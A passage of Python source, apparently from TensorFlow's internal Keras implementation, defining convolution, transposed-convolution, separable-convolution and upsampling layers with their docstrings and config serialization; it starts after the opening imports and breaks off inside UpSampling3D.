from tensorflow.python.keras._impl.keras.engine import Layer
# imports for backwards namespace compatibility
# pylint: disable=unused-import
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling1D
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling2D
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling3D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling1D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling2D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling3D
# pylint: enable=unused-import
from tensorflow.python.keras._impl.keras.utils import conv_utils
from tensorflow.python.layers import convolutional as tf_convolutional_layers
class Conv1D(tf_convolutional_layers.Conv1D, Layer):
"""1D convolution layer (e.g. temporal convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`, e.g.
`(10, 128)` for sequences of 10 vectors of 128-dimensional vectors,
or `(None, 128)` for variable-length sequences of 128-dimensional vectors.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number output of filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
filters,
kernel_size,
strides=1,
padding='valid',
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(Conv1D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format='channels_last',
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv2D(tf_convolutional_layers.Conv2D, Layer):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number output of filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv3D(tf_convolutional_layers.Conv3D, Layer):
"""3D convolution layer (e.g. spatial convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number output of filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv3D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv2DTranspose(tf_convolutional_layers.Conv2DTranspose, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2DTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv3DTranspose(tf_convolutional_layers.Conv3D, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along the depth, height
and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, depth, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, depth, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
`depth` and `rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv3DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv3DTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class SeparableConv2D(tf_convolutional_layers.SeparableConv2D, Layer):
"""Depthwise separable 2D convolution.
Separable convolutions consist in first performing
a depthwise spatial convolution
(which acts on each input channel separately)
followed by a pointwise convolution which mixes together the resulting
output channels. The `depth_multiplier` argument controls how many
output channels are generated per input channel in the depthwise step.
Intuitively, separable convolutions can be understood as
a way to factorize a convolution kernel into two smaller kernels,
or as an extreme version of an Inception block.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number output of filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
depth_multiplier: The number of depthwise convolution output channels
for each input channel.
The total number of depthwise convolution output
channels will be equal to `filterss_in * depth_multiplier`.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
depthwise_initializer: Initializer for the depthwise kernel matrix.
pointwise_initializer: Initializer for the pointwise kernel matrix.
bias_initializer: Initializer for the bias vector.
depthwise_regularizer: Regularizer function applied to
the depthwise kernel matrix.
pointwise_regularizer: Regularizer function applied to
the pointwise kernel matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
depthwise_constraint: Constraint function applied to
the depthwise kernel matrix.
pointwise_constraint: Constraint function applied to
the pointwise kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=1,
depth_multiplier=1,
activation=None,
use_bias=True,
depthwise_initializer='glorot_uniform',
pointwise_initializer='glorot_uniform',
bias_initializer='zeros',
depthwise_regularizer=None,
pointwise_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
depthwise_constraint=None,
pointwise_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(SeparableConv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
depthwise_initializer=initializers.get(depthwise_initializer),
pointwise_initializer=initializers.get(pointwise_initializer),
bias_initializer=initializers.get(bias_initializer),
depthwise_regularizer=regularizers.get(depthwise_regularizer),
pointwise_regularizer=regularizers.get(pointwise_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
depthwise_constraint=constraints.get(depthwise_constraint),
pointwise_constraint=constraints.get(pointwise_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'dilation_rate':
self.dilation_rate,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'depthwise_initializer':
initializers.serialize(self.depthwise_initializer),
'pointwise_initializer':
initializers.serialize(self.pointwise_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'depthwise_regularizer':
regularizers.serialize(self.depthwise_regularizer),
'pointwise_regularizer':
regularizers.serialize(self.pointwise_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'depthwise_constraint':
constraints.serialize(self.depthwise_constraint),
'pointwise_constraint':
constraints.serialize(self.pointwise_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint)
}
base_config = super(SeparableConv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class UpSampling1D(Layer):
"""Upsampling layer for 1D inputs.
Repeats each temporal step `size` times along the time axis.
Arguments:
size: integer. Upsampling factor.
Input shape:
3D tensor with shape: `(batch, steps, features)`.
Output shape:
3D tensor with shape: `(batch, upsampled_steps, features)`.
"""
def __init__(self, size=2, **kwargs):
super(UpSampling1D, self).__init__(**kwargs)
self.size = int(size)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
size = self.size * input_shape[1] if input_shape[1] is not None else None
return tensor_shape.TensorShape([input_shape[0], size, input_shape[2]])
def call(self, inputs):
output = K.repeat_elements(inputs, self.size, axis=1)
return output
def get_config(self):
config = {'size': self.size}
base_config = super(UpSampling1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class UpSampling2D(Layer):
"""Upsampling layer for 2D inputs.
Repeats the rows and columns of the data
by size[0] and size[1] respectively.
Arguments:
size: int, or tuple of 2 integers.
The upsampling factors for rows and columns.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, rows, cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, rows, cols)`
Output shape:
4D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, upsampled_rows, upsampled_cols, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, upsampled_rows, upsampled_cols)`
"""
def __init__(self, size=(2, 2), data_format=None, **kwargs):
super(UpSampling2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
self.size = conv_utils.normalize_tuple(size, 2, 'size')
self.input_spec = InputSpec(ndim=4)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
height = self.size[0] * input_shape[
2] if input_shape[2] is not None else None
width = self.size[1] * input_shape[
3] if input_shape[3] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], input_shape[1], height, width])
else:
height = self.size[0] * input_shape[
1] if input_shape[1] is not None else None
width = self.size[1] * input_shape[
2] if input_shape[2] is not None else None
return tensor_shape.TensorShape(
[input_shape[0], height, width, input_shape[3]])
def call(self, inputs):
return K.resize_images(inputs, self.size[0], self.size[1], self.data_format)
def get_config(self):
config = {'size': self.size, 'data_format': self.data_format}
base_config = super(UpSampling2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class UpSampling3D(Layer):
"""Upsampling layer for 3D inputs.
Repeats the 1st, 2nd and 3rd dimensions
of the data by size[0], size[1] and size[2] respectively.
Arguments:
size: int, or tuple of 3 integers.
The upsampling factors for dim1, dim2 and dim3.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
Input shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, dim1, dim2, dim3, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, dim1, dim2, dim3)`
Output shape:
5D tensor with shape:
- If `data_format` is `"channels_last"`:
`(batch, upsampled_dim1, upsampled_dim2, upsampled_dim3, channels)`
- If `data_format` is `"channels_first"`:
`(batch, channels, upsampled_dim1, upsampled_dim2, upsampled_dim3)`
"""
def __init__(self, size=(2, 2, 2), data_format=None, **kwargs):
self.data_format = conv_utils.normalize_data_format(data_format)
self.size = conv_utils.normalize_tuple(size, 3, 'size')
self.input_spec = InputSpec(ndim=5)
super(UpSampling3D, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_first':
dim1 = self.size[0] * input_shape[
2] if input_shape[2] is not None else None
dim2 = self.size[1] * input_shape[
3] if input_shape[3] is not None else None
